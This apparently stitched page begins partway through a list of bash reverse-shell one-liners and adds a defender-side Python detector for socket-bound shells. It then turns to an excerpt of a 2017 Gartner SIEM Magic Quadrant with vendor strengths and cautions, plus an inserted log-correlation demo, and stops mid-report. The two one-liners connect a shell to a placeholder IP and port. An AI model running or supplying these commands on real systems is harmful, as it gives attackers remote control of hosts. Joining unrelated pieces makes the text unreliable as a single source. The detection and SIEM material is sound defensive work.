2. exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

3. exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
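Every one-liner above ends the same way: a shell whose standard input and output are a TCP socket (dup2 of the socket onto fds 0, 1 and 2; `>& /dev/tcp/...`; `<&3 >&3`). That is also what makes them detectable on the host. The following is an added defender-side check, not part of the original post: on Linux, `/proc/<pid>/fd/0` and `/fd/1` of such a shell resolve to `socket:[inode]`, whereas an interactive shell points at a pty and a scripted one at a pipe or file. The decision is kept in a pure function (`is_reverse_shell_candidate`) so it can be tested on constructed fd targets; `scan_proc` applies it to the live system. The shell-name list and the function names are this example's own choices.

```python
"""Added example: flag shells whose stdin/stdout are network sockets (Linux /proc)."""
import os
import re

# Process names (from /proc/<pid>/comm) treated as shells; an assumption for this demo.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
# readlink() of /proc/<pid>/fd/N yields "socket:[<inode>]" for a socket.
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")


def is_reverse_shell_candidate(comm, stdio_targets):
    """Decide from a process name and the link targets of fds 0, 1, 2.

    comm          -- contents of /proc/<pid>/comm (e.g. "sh", "bash")
    stdio_targets -- [target_fd0, target_fd1, target_fd2]; None if unreadable
    A shell whose stdin AND stdout are both sockets has no legitimate local
    terminal attached, which is exactly the shape of the one-liners above.
    """
    if comm not in SHELLS or len(stdio_targets) < 2:
        return False
    return all(t is not None and SOCKET_LINK.match(t) for t in stdio_targets[:2])


def scan_proc(proc="/proc"):
    """Return [(pid, comm, [fd0, fd1, fd2])] for suspicious shells. Linux only;
    returns [] where /proc is absent. Other users' fds are unreadable without
    privileges and simply show up as None."""
    hits = []
    if not os.path.isdir(proc):
        return hits
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/comm") as f:
                comm = f.read().strip()
            targets = []
            for fd in (0, 1, 2):
                try:
                    targets.append(os.readlink(f"{proc}/{pid}/fd/{fd}"))
                except OSError:
                    targets.append(None)
        except OSError:
            continue  # process exited mid-scan or is not ours to inspect
        if is_reverse_shell_candidate(comm, targets):
            hits.append((int(pid), comm, targets))
    return hits


if __name__ == "__main__":
    # Run as root to see every process's fds; prints nothing on a clean host.
    for pid, comm, targets in scan_proc():
        print(f"pid={pid} comm={comm} stdio={targets}")
```

This catches the dup2, `>&` and `<&3 >&3` forms directly. Variant 2 of the bash list keeps the socket on fd 5 and feeds the loop through a pipe, so a production check should inspect all fds of shell processes rather than only 0 and 1, and pair the host-side view with network telemetry (outbound connections from shell or interpreter processes) for the cases where the socket is held by a parent interpreter rather than the shell itself.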


Magic Quadrant for Security Information and Event Management

Published: 04 December 2017 ID: G00315428

Summary

Security and risk management leaders are implementing and expanding SIEM to improve early targeted attack detection and response. Advanced users seek SIEM with advanced profiling, analytics and response features.

Market Definition/Description

This document was revised on 26 February 2018. The document you are viewing is the corrected version. For more information, see the Corrections page on gartner.com.

The security information and event management (SIEM) market is defined by the customer’s need to analyze event data in real time for the early detection of targeted attacks and data breaches, and to collect, store, analyze, investigate and report on event data for incident response, forensics and regulatory compliance. The vendors included in our Magic Quadrant analysis have products designed for this purpose, and they actively market and sell these technologies to the security buying center.

SIEM tools aggregate event data produced by security devices, network infrastructure, systems and applications. The primary data source is log data, but SIEM tools can also process other forms of data, such as NetFlow and network packets, or contextual information about users, assets, threats and vulnerabilities that can be found inside or outside the enterprise and that can be useful to enrich logs and raw data. All these data are normalized so that events, data and contextual information from disparate sources can be correlated and analyzed for specific purposes, such as threat management, network security event monitoring (SEM), user activity monitoring and compliance reporting. The tools provide real-time correlation of events for security monitoring, enable query and analytics for historical analysis, and offer other support for incident investigation and compliance reporting.
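The normalize, enrich and correlate steps described above are easiest to see on concrete input. The block below is an added example written for this page, not code from Gartner or from any vendor in the report: it takes three constructed log lines in different formats (a firewall syslog line, a Windows-style logon event as key=value text, and a JSON application log), maps them onto one common event schema, enriches them from a constructed asset inventory, and runs a single correlation rule (repeated failed logins followed by a success from the same source and user inside a time window). All log lines, asset entries, field names, and rule thresholds are constructed for the demo.

```python
"""Added example: a miniature SIEM pipeline (normalize -> enrich -> correlate)."""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample events from three disparate sources (not real logs).
RAW_LINES = [
    "2024-01-10T09:00:00Z fw01 kernel: DENY src=203.0.113.7 dst=10.0.0.5 dpt=22",
    "ts=2024-01-10T09:00:05Z host=dc01 EventID=4625 user=alice src=203.0.113.7",
    "ts=2024-01-10T09:00:09Z host=dc01 EventID=4625 user=alice src=203.0.113.7",
    "ts=2024-01-10T09:00:13Z host=dc01 EventID=4625 user=alice src=203.0.113.7",
    "ts=2024-01-10T09:00:20Z host=dc01 EventID=4624 user=alice src=203.0.113.7",
    '{"time":"2024-01-10T09:30:00Z","app":"portal","user":"bob",'
    '"event":"login","result":"ok","client":"198.51.100.9"}',
]

# Constructed asset inventory used for enrichment: target -> business context.
ASSETS = {
    "10.0.0.5": {"name": "bastion", "criticality": "high"},
    "dc01": {"name": "dc01", "criticality": "high"},
}

SYSLOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) kernel: (?P<action>DENY|ALLOW) "
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) dpt=(?P<dpt>\d+)$"
)


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize(line):
    """Map one raw line from any of the three sources onto a common schema:
    ts, host, src_ip, user, category (auth|network), outcome."""
    if line.startswith("{"):                      # JSON application log
        d = json.loads(line)
        return {"ts": parse_ts(d["time"]), "host": d["app"], "src_ip": d["client"],
                "user": d["user"], "category": "auth",
                "outcome": "success" if d["result"] == "ok" else "failure"}
    m = SYSLOG_RE.match(line)                     # firewall syslog line
    if m:
        return {"ts": parse_ts(m["ts"]), "host": m["host"], "src_ip": m["src"],
                "user": None, "category": "network",
                "outcome": "blocked" if m["action"] == "DENY" else "allowed",
                "dst_ip": m["dst"], "dst_port": int(m["dpt"])}
    kv = dict(tok.split("=", 1) for tok in line.split() if "=" in tok)
    if "EventID" in kv:                           # Windows-style logon event
        return {"ts": parse_ts(kv["ts"]), "host": kv["host"], "src_ip": kv["src"],
                "user": kv["user"], "category": "auth",
                "outcome": {"4624": "success", "4625": "failure"}.get(kv["EventID"], "unknown")}
    raise ValueError(f"unrecognized log format: {line!r}")


def enrich(event):
    """Attach asset context so an alert can be prioritized by what was targeted."""
    asset = ASSETS.get(event.get("dst_ip")) or ASSETS.get(event["host"])
    event["asset_criticality"] = asset["criticality"] if asset else "unknown"
    return event


def correlate_bruteforce(events, failures=3, window=timedelta(minutes=5)):
    """Rule: at least `failures` failed logins for one (src_ip, user) within
    `window`, followed by a success for the same pair, raises one alert."""
    alerts = []
    history = defaultdict(list)                   # (src_ip, user) -> failure timestamps
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["category"] != "auth":
            continue
        key = (ev["src_ip"], ev["user"])
        if ev["outcome"] == "failure":
            history[key].append(ev["ts"])
        elif ev["outcome"] == "success":
            recent = [t for t in history[key] if ev["ts"] - t <= window]
            if len(recent) >= failures:
                alerts.append({"rule": "bruteforce_then_success", "src_ip": ev["src_ip"],
                               "user": ev["user"], "host": ev["host"],
                               "failures": len(recent),
                               "criticality": ev["asset_criticality"]})
            history[key].clear()                  # a success resets the sequence
    return alerts


def run_pipeline(lines=RAW_LINES):
    """Normalize and enrich every line, then return (events, alerts)."""
    events = [enrich(normalize(line)) for line in lines]
    return events, correlate_bruteforce(events)


if __name__ == "__main__":
    for alert in run_pipeline()[1]:
        print(alert)
```

On the sample data the firewall event is normalized as a blocked network event against a high-criticality asset, bob's clean login on the portal raises nothing, and alice's three failures followed by a success on dc01 within the window produce one alert carrying the asset's criticality, which is the kind of context a SIEM adds beyond what any single log source shows.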

Magic Quadrant

Figure 1. Magic Quadrant for Security Information and Event Management (Source: Gartner, December 2017)

Vendor Strengths and Cautions

AlienVault

AlienVault competes in the SIEM market with two offerings: AlienVault Unified Security Management (USM) Appliance (physical or virtual) for on-premises deployment and AlienVault USM Anywhere, a cloud-based SaaS solution. USM Appliance includes file integrity monitoring (FIM) via the host intrusion detection system (IDS), NetFlow analysis and full-packet capture. USM Anywhere is designed to monitor cloud and on-premises environments from the AlienVault Secure Cloud. AlienVault also offers Open Threat Exchange (OTX), a free, community-supported threat intelligence sharing forum that integrates threat intelligence into USM. AlienVault Labs Threat Intelligence is a subscription service that updates correlation rules, reports, response templates, signatures for IDS and vulnerability checks in both USM Appliance and USM Anywhere. AlienVault is no longer offering its USM for Amazon Web Services (AWS) product, and customers of USM AWS have been migrated to USM Anywhere.

USM Anywhere became generally available in February 2017, and is the result of a from-scratch development effort. The focus of USM Anywhere is monitoring cloud environments, initially AWS and Microsoft Azure, although monitoring of on-premises technology is supported as well. The USM Anywhere architecture accommodates apps (AlienApps) to enable adding capabilities in a modular fashion. USM Anywhere and USM Appliance features and capabilities differ somewhat. AlienVault’s current plans are to continue to offer both USM Appliance and USM Anywhere. The pricing model for USM Appliance is based on the number of appliances required, available as a perpetual license or monthly subscription. USM Anywhere is sold as a monthly subscription, priced by the volume of data consumed.

STRENGTHS
  • USM Appliance and USM Anywhere provide several integrated security capabilities, including asset discovery, FIM, vulnerability assessment, and both host-based and network-based intrusion detection systems.
  • AlienVault provides content updates via its Threat Intelligence subscriptions, as well as community source intelligence, that are integrated into the monitoring, detection and reporting functions of USM Appliance and USM Anywhere.
  • Customers report that the security monitoring technologies included with USM offer a lower cost for more capabilities compared with products from most competitors in the SIEM space.
  • The pricing model for USM Anywhere and USM Appliance is straightforward and easy to understand, and the availability of monthly subscription pricing for USM Appliance offers flexibility.
CAUTIONS
  • There are differences in the capabilities of USM Appliance and USM Anywhere that may present potential buyers with trade-offs. For example, capturing NetFlow data is supported by USM Appliance, but not by USM Anywhere. USM Anywhere, however, can capture VPC flow logs from AWS. USM Appliance uses correlations to provide basic enrichment of event data with user context, and USM Anywhere uses a graph-based engine to support a basic user and entity behavior analytics (UEBA) capability focused on cloud environments.
  • USM Appliance has more limited support for cloud environments than USM Anywhere. For example, in AWS, USM Anywhere monitors CloudTrail, CloudWatch Classic Load Balancer, Application Load Balancer and Simple Storage Service (S3) access, plus logs for installed software, and provides vulnerability assessments. USM Appliance provides monitoring of Windows and Linux guests on AWS via an HIDS agent.
  • AlienVault’s target market is midsize enterprises and smaller organizations. As a result, enterprise-oriented features, such as role-based workflow, ticketing integrations, support for multiple threat intelligence feeds and advanced analytics capabilities, lag behind those of competitors that focus on enterprise customers.

BlackStratus

BlackStratus is a SIEM technology and service-focused vendor with solutions aimed at large enterprises, small or midsize businesses (SMBs), managed security service providers (MSSPs), and managed service providers (MSPs). The portfolio is composed of LOGStorm, SIEMStorm and CYBERShark. LOGStorm is a log and event management and reporting tool targeted at SMBs and MSSPs. It is available as a physical and virtual appliance. LOGStorm leverages a Vertica big data platform and stores both raw and normalized event data. SIEMStorm is a natively multitenant platform that is delivered as software, where components can be installed on a single physical or virtual server, or installed separately depending on the size and scope of the environment to be monitored. SIEMStorm includes core SIEM capabilities including real-time event management, correlation, analytics, workflow and incident response, and reporting. It is targeted at large enterprises or organizations with federated security monitoring requirements (e.g., across lines of business or child companies), as well as at MSSPs needing to support customers in a shared, multitenant environment. CYBERShark is a SIEM as a service aimed at MSPs and SMBs. It is delivered as a cloud-based solution, along with 24/7 Tier 1 security operations center (SOC) security monitoring and alerting services.

Recent enhancements of the platforms include a variety of new product integrations, in particular support for AWS, Azure, Office 365 and ServiceNow, as well as improvements to the user interface and back-end performance optimizations. Support for GE Digital (Wurldtech) OpShield was added to extend SIEMStorm to operational technology security monitoring use cases.

STRENGTHS
  • The architectures for SIEMStorm and LOGStorm are flexible for both deployment and expansion. All application components are multitenant out of the box.
  • Integrations added over the past 12 months extend support for popular service desk solutions, as well as SaaS and IaaS environments.
  • Support for OT data sources is now a native feature, albeit with limited support for OT security-based threat detection vendors, such as GE Digital (Wurldtech).
  • SIEMStorm includes a fully integrated incident and ticket management system based on the SANS Institute’s incident handling process.
CAUTIONS
  • Native advanced threat detection solutions, such as FIM, endpoint detection and response (EDR), network deep packet inspection, and network forensics, are not available. The vendor’s open API does allow for integration with a variety of third-party solutions.
  • Advanced analytics capabilities are very limited. BlackStratus indicates that expansion of analytics is planned over the next year.
  • Support for identity and access management (IAM) solutions is limited. User-based event monitoring is provided for Active Directory (AD) and a variety of web access management (WAM) solutions.
  • SIEMStorm’s workflow capabilities lack orchestration and automation features.
  • BlackStratus has a large MSSP and MSP customer base, but lacks visibility with Gartner’s enterprise and SMB end-user clients.

Dell Technologies (RSA)

RSA (a Dell Technologies business since the acquisition of EMC by Dell in September 2016) competes in the SIEM market via its RSA NetWitness Suite. The suite is composed of RSA NetWitness Logs and Packets, RSA NetWitness Endpoint, and RSA NetWitness Security Operations (SecOps) Manager. RSA NetWitness Suite is focused on real-time threat detection, incident response, forensics and threat hunting use cases leveraging network full-packet capture, security event and log data, NetFlow, and telemetry from endpoints. The architecture is composed of the RSA NetWitness Server along with Decoders (full-packet capture, logs, NetFlow and endpoint data collection); Concentrators (metadata aggregation and indexing); Event Stream Analytics (analytics for real-time monitoring and alerting); and Archivers (data and event archiving tier). There is a stand-alone management server for RSA NetWitness Endpoint. RSA NetWitness Suite offers flexible deployment options as it can be installed as software, physical and virtual appliances, and in hybrid configurations. On-premises as well as IaaS environments are supported. Scalability (both vertically and horizontally) is supported through the deployment of additional components (e.g., Decoders, Concentrators and Archivers). RSA NetWitness SecOps Manager, a module in the RSA Archer solution, adds advanced incident management workflow, operational playbooks, management dashboards and reporting. The solution is primarily licensed by volume (software model) or per appliance for Logs and Packets, and by number of agents for Endpoint. Both perpetual and term models are available.

Since mid-2016, RSA has added additional support for event and data collection within IaaS (AWS and Azure), support for deploying RSA NetWitness Suite components in AWS, and additional feature and functionality enhancements, such as the addition of RSA Live-delivered content packs focused on new users as well as advanced threat hunters, Trial Rules (allows rules to be demoed before being implemented in production), Endpoint agent support added for Linux and Mac, and expanded command-and-control behavior-based analytics. RSA NetWitness Suite 11, released in October 2017, provides a new user interface and enhancements to capabilities for investigation, incident management and identity insights.

STRENGTHS
  • RSA NetWitness Suite offers a single-solution approach for threat detection and event monitoring, investigation, and response across network traffic, endpoints and other security event and log data sources.
  • RSA NetWitness Suite’s focus on advanced threat detection, incident response, forensics and threat hunting makes it a viable solution for buyers with, or planning to deploy, a SOC and those looking for a single, integrated platform across teams.
  • RSA Live, a cloud-based service, provides a marketplace-type interface for RSA NetWitness content packs (threat detection rules, parsers, reports), threat intelligence and third-party integrations. Threat intelligence and content updates can be automated so they are seamless to users.
  • The RSA NetWitness Suite provides a flexible architecture that scales from a single appliance to complex n-tier deployments, which can span both on-premises and IaaS.
  • Out-of-the-box threat intelligence includes access to over two dozen threat feeds, including intelligence from RSA’s FirstWatch research team and incident response activities, and RSA Live provides crowdsourced threat intelligence from RSA NetWitness customers.
CAUTIONS
  • RSA NetWitness Suite’s user interface is basic compared to competing SIEM solutions. RSA indicates that a new UI is included with version 11, released in October 2017.
  • RSA NetWitness Logs and Packets lags behind similar SIEM solutions in UEBA capabilities. Integrations are available with third-party UEBA vendors.
  • RSA NetWitness Suite’s incident management capabilities are lightweight. Buyers looking for richer workflow capabilities need to purchase RSA NetWitness SecOps Manager.
  • Native security orchestration and automation capabilities are limited, but out-of-the-box integrations with most third-party security operations, analytics and reporting (SOAR) solutions are available.

EventTracker

In October 2016, EventTracker merged with Netsurion, a provider of managed security services, and EventTracker continues as a subsidiary with its own brand. EventTracker targets its SIEM software and service offerings primarily at midsize and government organizations with security event management and compliance reporting requirements. EventTracker Enterprise software is available, with licensing based on the number of event sources. Standard components include correlation, alerting, behavior analysis, reporting, dashboards and a large number of event source knowledge packs. Options include configuration assessment, change audit FIM, ntopng, flow analyzer, honeynet, threat intelligence feeds and the analyst data mart. Service offerings include SIEMphonic co-managed SIEM aligned to run, watch, tune and comply with activities performed on schedules ranging from daily to weekly. Collection from and deployment in AWS and Azure are natively supported.

In the past year, EventTracker has added a security scorecard dashboard that provides a risk-prioritized view of security incidents and a deception component (honeynet) offered as a managed service. Support for NIST SP 800-171 and the EU’s General Data Protection Regulation (GDPR), as well as 23 NYCRR 500 compliance, was also introduced.

Midsize businesses requiring a software-based solution for log and event management, compliance reporting, and operations monitoring via on-premises or cloud-hosted SIEM with optional, flexible monitoring services should consider EventTracker.

STRENGTHS
  • EventTracker is easy to deploy and maintain, and offers compliance and use-case-specific content with prebuilt alerts, correlation rules and reports.
  • EventTracker’s software pricing model is based on the number of event sources and is thus relatively straightforward for potential customers to understand. Perpetual license and annual subscription pricing are offered.
  • EventTracker’s SIEMphonic managed SIEM services aligned with run, watch, tune and comply activity are a differentiator, and address the needs of its target market.
CAUTIONS
  • EventTracker’s SIEMphonic managed SIEM services offerings are based on data volume (not event source count, which is the model for the software), thus potential buyers comparing options will need to make different calculations when developing assumptions about the scope and growth of the monitored environment.
  • EventTracker’s advanced threat detection features are basic, Windows-centric and, in the case of flow and packet capture, not cleanly integrated into the core product. Integrations with third-party advanced threat detection/response technologies are not available.
  • EventTracker’s capabilities for application monitoring are more limited than SIEM products that target enterprise deployments, as they lack integration with major packaged applications.
  • Full incident management, including ticketing, requires an external solution. Several integrations via email and XML are supported.

Exabeam

Exabeam Security Intelligence Platform is a collection of components that collectively deliver the Exabeam SIEM solution that was introduced in February 2017. The platform is built on a variety of big data technologies, including Elastic, Hadoop, Kafka and Spark. Data management (collection, parsing, indexing and storage) is provided by Log Manager, which also includes agent-based collectors that can collect logs from local resources or from cloud-based applications using RESTful APIs. Advanced Analytics, also sold as Exabeam’s stand-alone UEBA tool, provides analytics functionality via a collection of both expert rules as well as behavior- and machine learning (ML)-based analytics. Incident Responder provides workflow, case management, security orchestration and automation capabilities. Threat Hunter is a search and investigation tool oriented toward analysts doing incident investigations and analyses, or threat-hunting-oriented activities. Threat Hunter provides user-based timelines rather than focusing on standard query and search approaches. Customers requiring connecting to IaaS and SaaS can purchase Exabeam’s Cloud Connectors, which are prebuilt API connectors for a variety of services, such as several AWS services, Office 365, SharePoint, Box and Salesforce. Exabeam’s components can be run on dedicated appliances (two versions are currently available), and installed as software or virtual appliances.

STRENGTHS
  • Exabeam’s licensing approach is based on the number of users in an organization, rather than the velocity or volume of event, log and contextual data analyzed.
  • Exabeam has established itself as complementary to existing SIEM solutions through its UEBA solution, which forms the core of the vendor’s solution portfolio. Advanced Analytics is included as part of the core platform, rather than as an add-on to complement traditional signature- and correlation-based rules.
  • Customers can customize the SIEM platform by selecting the components to meet their requirements (e.g., starting out with Log Manager and Advanced Analytics and adding Incident Responder and Threat Hunter as buyer experience and maturity in security monitoring improve).
  • Exabeam’s architecture is big data-oriented and supports a variety of deployment options (physical and virtual, and on-premises, IaaS or hybrid) and offers easy horizontal scalability through the addition of more appliances.
CAUTIONS
  • Most of Exabeam’s full platform, except for Advanced Analytics (which has been available for several years as a stand-alone UEBA tool, complementing SIEM), does not yet have widespread adoption and use compared to most SIEM solutions on the market.
  • Predefined reporting capabilities against industry and regulatory requirements are nascent, given the focus on user-based monitoring. Reports can be created from searches and saved as dashboards, or created from visualization capabilities for viewing and exporting.
  • Exabeam’s platform lacks native network traffic analysis capabilities, although it supports a variety of third-party solutions. Flow data cannot yet be analyzed, but is available for ingestion and searches as part of incident investigations.

FireEye

FireEye is a new entrant in the SIEM Magic Quadrant. FireEye’s SIEM offering is Threat Analytics Platform (TAP), which is delivered as a service leveraging AWS. TAP provides real-time security analytics, investigative threat hunting, monitoring and data management, and storage, with data segregated on a per-customer basis. Integrated threat intelligence is provided by in-house iSIGHT security researchers and Mandiant incident responders. Both multitenant as well as single-instance versions are supported.

TAP customers deploy a Cloud Collector appliance on their network to aggregate and securely transmit logs to TAP. Cloud Collector can also be deployed as a network security monitoring appliance that generates its own network metadata events as well as providing selective full-packet capture. Cloud Collector can be deployed as software, an ISO installer that supports bare-metal hardware or virtualized environments, or a physical appliance. Licensing is based on events per second (EPS) and data storage/retention requirements (13 months is the default).

STRENGTHS
  • TAP’s as-a-service delivery model gets strong marks for ease of deployment. There is no technology for customers to manage and only Cloud Collector appliances to deploy. There is out-of-the-box support for a large variety of event sources. There are more than 2,300 predefined rules for alerting, which are updated or added continually.
  • Threat intelligence from FireEye iSIGHT, as well as curated open-source feeds, is included with the service.
  • Guided investigation support for incidents and events includes best-practice suggestions and predefined searches.
  • FireEye provides an optional 24/7 monitoring service (FireEye as a Service) for customers that lack the resources to staff full-time operations.
CAUTIONS
  • TAP currently includes a limited number of report templates, with PCI and HIPAA templates available for compliance reporting.
  • Integrations with enterprise configuration management databases (CMDBs) and AD, support for STIX and TAXII, and more advanced orchestration and automation features are available only with the additional purchase of FireEye Security Orchestrator.
  • Potential customers should closely evaluate TAP’s current capabilities for advanced analytics against the use cases they want to support. User behavior analytics and analytics covering long time frames are not available.

Fortinet

FortiSIEM, acquired from AccelOps in 2016, is a component of Fortinet’s Security Fabric framework that provides traditional SIM and SEM capabilities, complemented by a built-in CMDB, application and system performance monitoring capabilities, and agent-based FIM. Fortinet positions FortiSIEM for MSPs, telecommunications providers and MSSPs that use or support other Fortinet solutions, in addition to security operations buyers in large enterprises, government and education. FortiSIEM has been adopted by organizations where security and network operations monitoring are delivered from a unified solution, as well as by MSPs and MSSPs that take advantage of the full FortiSIEM stack.

FortiSIEM’s architecture is composed of four components (Supervisor, Worker, Collector and Report Server) that are deployed via virtual appliances supported across a variety of on-premises (ESX, KVM, Hyper-V, Xen and OpenStack) and IaaS platforms (AWS and Azure), and can be deployed as a single appliance or as stand-alone components for scalability. Data management leverages a mix of big data (NoSQL) and RDBMS. Managed SIEM as a service is also available to end users as well as to MSPs and MSSPs. Physical appliance options and a remediation library for integrations with third-party tools are expected later in 2017. Licensing is primarily based on the number of data sources, EPS and agents deployed.

Over the past 12 months, Fortinet has added additional integrations within the Fortinet Security Fabric, as well as adding risk-based scoring for devices; STIX and TAXII support for improved threat intelligence capabilities; user activity auditing for SaaS such as Office 365 and G Suite; and the initial move to an HTML5-based UI.

STRENGTHS
  • FortiSIEM provides a single platform for organizations looking to support multiple environments (on-premises physical and virtual, SaaS, and IaaS), use cases and teams across IT (network operations, security operations and application performance monitoring [APM]).
  • A built-in autodiscovery feature and an integrated CMDB capability support use cases across IT, network operations and security operations.
  • FortiSIEM’s scope of reporting covers a wide variety of compliance requirements and best practices for both security operations and network operations across several geographies.
  • Midmarket organizations, especially those leveraging other Fortinet products, where security responsibilities are federated out to teams like network operations, will benefit from the unified platform available with FortiSIEM, which includes native workflow and the ability to perform basic automated response activities.
CAUTIONS
  • FortiSIEM lags behind the competition in advanced analytics capabilities and easy integration (e.g., through an app store interface) with third-party technologies, such as EDR, UEBA, and security orchestration and automation tools.
  • Out-of-the-box threat intelligence is not provided, but support for Fortinet’s FortiGuard threat intelligence platform, as well as integrations with third-party threat feeds, is provided.
  • FortiSIEM has limited visibility with Gartner clients procuring SIEM solutions.

IBM

IBM QRadar Security Intelligence Platform is composed of QRadar SIEM at the core, with additional components providing complementary security monitoring and operations capabilities, such as log management (Log Manager), network monitoring (QFlow, Network Insights and Incident Forensics), vulnerability management (Vulnerability Manager) and risk management (Risk Manager). IBM positions QRadar as an on-premises solution available via a stand-alone or distributed architecture, SIEM as a service (QRadar on Cloud) or as co-managed QRadar in partnership with IBM Managed Security Services. QRadar’s on-premises architecture is deployed via physical or virtual appliances (for on-premises or IaaS), software, and hosted cloud. The core components include Event Collectors and Event Processors, QFlow Collectors and Processors, Data Nodes, and Consoles, in addition to the premium components. Advanced threat detection and response capabilities include UEBA functionality (the QRadar UBA App) supported by ML-based analytics (QRadar Machine Learning Analytics app), threat intelligence provided by IBM’s X-Force Threat Intelligence feed, QRadar Advisor with Watson app and Resilient Incident Response Platform for incident response and orchestration and automation capabilities. IBM QRadar is licensed primarily by EPS and flows per second (FPS), and premium modules and apps are charged separately.

Over the past 12 months, IBM has introduced a variety of new capabilities, including user behavior analytics (UBA), Machine Learning Analytics app, Advisor with Watson app, Network Insights and platform enhancements around user interfaces and usability features, and data storage compression and optimization. Integrations with partners have been expanded through additions to QRadar App Exchange. IBM Resilient (an incident response tool) is now being offered as a premium service alongside QRadar engagements.

STRENGTHS
  • QRadar supports both midsize and large enterprises that require core SIEM capabilities, in addition to those looking for a unified platform that covers a wide range of security monitoring and operational technologies.
  • QRadar provides a flexible architecture that can support a variety of environments, including hybrid monitoring options across on-premises and IaaS.
  • QRadar App Exchange provides an improved user experience for integrating premium content, content packs and third-party security controls into the QRadar Console and Security Intelligence Platform compared to many competitors.
  • Buyers looking to implement advanced analytics and user-based monitoring will benefit from the free UBA and ML apps provided with the core SIEM product.
  • QRadar offers a single view across real-time and historic network-based event sources through the correlation of log data, NetFlow, QFlow, deep packet inspection (via Network Insights) and full-packet capture.
  • There is widespread availability of managed service support for on-premises QRadar deployments from third parties (and from IBM for large accounts), and QRadar is also available in a hosted SIEM model.
CAUTIONS
  • Endpoint monitoring for threat detection and response, or basic file integrity, requires use of third-party technologies. IBM has positioned its BigFix product as a component in this space, especially for security response activities, but there has been very little interest from Gartner clients for this approach.
  • Gartner clients that have deployed or are considering QRadar have not expressed much interest in QRadar Advisor with Watson.
  • While IBM has introduced its UBA and ML apps, UBA features lag behind the UEBA-centric SIEM vendors. Integrations with several UEBA vendors are supported through QRadar App Exchange.
  • IBM Resilient still lacks native integration into the QRadar platform. Integration is available through QRadar App Exchange.
  • Customer feedback on the QRadar architecture is generally positive, but for buyers requiring a multicomponent-based architecture, the number of licensable components and options required generates confusion as part of the acquisition and purchase process.

LogRhythm

LogRhythm Threat Lifecycle Management Platform provides core SIEM capabilities, in addition to optional add-ons for network and host monitoring. LogRhythm’s SIEM solution consists of several components that can be run from a single appliance or separately as discrete components — Data Collector, Data Processor, Data Indexer, AI Engine, Platform Manager and WebUI Services. System Monitor Agents (available for Windows, Unix and Linux platforms and in two flavors — Pro and Lite) provide FIM functions, but can also act as event forwarders to Data Collectors. Network Monitor provides network and application traffic visibility, as well as selective packet capture for forensic purposes. LogRhythm’s SIEM can be deployed in a variety of ways — as software, or as physical or virtual appliances, either as a single-appliance solution or as the various discrete components, to support a variety of architectural approaches. LogRhythm can be deployed on-premises, in IaaS and in hybrid operating models. Multitenancy for MSSP buyers is also natively supported. LogRhythm SIEM uses a velocity-based licensing approach measured by messages per second (MPS), and licenses are available as perpetual or term. Enterprise license agreements are also available. Physical appliances are available for an additional charge. System Monitor is priced per host, and Network Monitor is priced per gigabit of throughput.

In the past 12 months, LogRhythm has made usability improvements across a variety of functions and features, including case management, workflow and response with the SmartResponse feature, and real-time monitoring; improved its user monitoring analytics; delivered enhancements to System Monitor and Network Monitor (including expansion into OT environment monitoring); and delivered content updates via AI Engine.

STRENGTHS
  • LogRhythm provides a strong platform for organizations that want a contained platform that includes core SIEM capabilities enhanced by complementary host and network monitoring capabilities, in a solution that can scale from a single appliance up to n-tier architectures.
  • LogRhythm’s out-of-the-box content (and updates delivered to the AI Engine component), along with a powerful user interface, provides a strong real-time monitoring experience for users.
  • SmartResponse allows users to integrate preconfigured automated response activities into their alert, investigation and response activities, either fully automated or semiautomated (e.g., manually initiated).
  • Organizations considering security monitoring of ICS/SCADA or OT environments, or looking to merge security event monitoring of their IT and OT environments, should consider LogRhythm.
  • Gartner clients, particularly midsize and smaller enterprise organizations, report that the simplified deployment model and support by LogRhythm via the Core Deployment Service is useful. Customers with specific use cases indicate that the Analytics Co-Pilot Service is also useful to speed up implementation times.
CAUTIONS
  • LogRhythm lags the UEBA-centric SIEM vendors in ML-driven analytics. The vendor has announced a cloud-based advanced analytics capability called CloudAI, which was released to a limited number of users in early 2017, with general availability targeted for 4Q17.
  • There is no application store for easily integrating third-party solutions like several other competing products, and the platform’s APIs are less open to third parties to facilitate easier integrations, although LogRhythm has a partner program to facilitate custom integrations.
  • LogRhythm supports a limited number of threat intelligence feeds out of the box, although users can add custom STIX/TAXII feeds with the LogRhythm TIS utility, and LogRhythm provides API-based support for other formats. Buyers with third-party threat intelligence feeds should confirm support with LogRhythm.
  • A few customers have expressed concerns about LogRhythm’s ability to scale to support very high event volume environments. Buyers with those environments should validate LogRhythm’s ability to support anticipated event and data volumes.
  • Some Gartner clients have raised concerns about the use of Windows as the underlying platform for components in the overall architecture (the Data Indexer is Linux-based), especially around maintaining patch and hotfix currency. Buyers should follow patching best practices and monitor LogRhythm for patch advisories.

ManageEngine

Log360 is the SIEM offering from ManageEngine, a division of Zoho. ManageEngine Log360 is composed of three components — EventLog Analyzer, which provides core SEM and SIM features including event log management, correlation-based analytics, and management/UI for reports, dashboards and log search functionality; ADAudit Plus, which provides real-time monitoring and auditing for AD; and Cloud Security Plus, which manages log event data from public cloud environments. EventLog Analyzer is offered in two versions: Premium is for single instance deployment, and Distributed, which uses a centralized admin server, is for large organizations or MSPs/MSSPs that need to scale horizontally beyond a single EventLog Analyzer instance (e.g., multitenant use cases or a single, geographically distributed organization). ADAudit Plus is offered in two versions — Standard and Professional — depending on the features required. Log360 is only available as a software version, but can be installed into virtual environments. It is licensed by the software components, version, and number of event log and data sources.

Over the past 12 months, ManageEngine has added support for monitoring AWS and Azure public cloud services, enhanced analytics with field-level correlation, improved incident response capabilities and integrations with service desk solutions. It has also added out-of-the-box threat intelligence feeds and improved auditing of AD (e.g., AD Federation Services [ADFS] and AD Lightweight Directory Services [ADLDS]), among other enhancements.

STRENGTHS
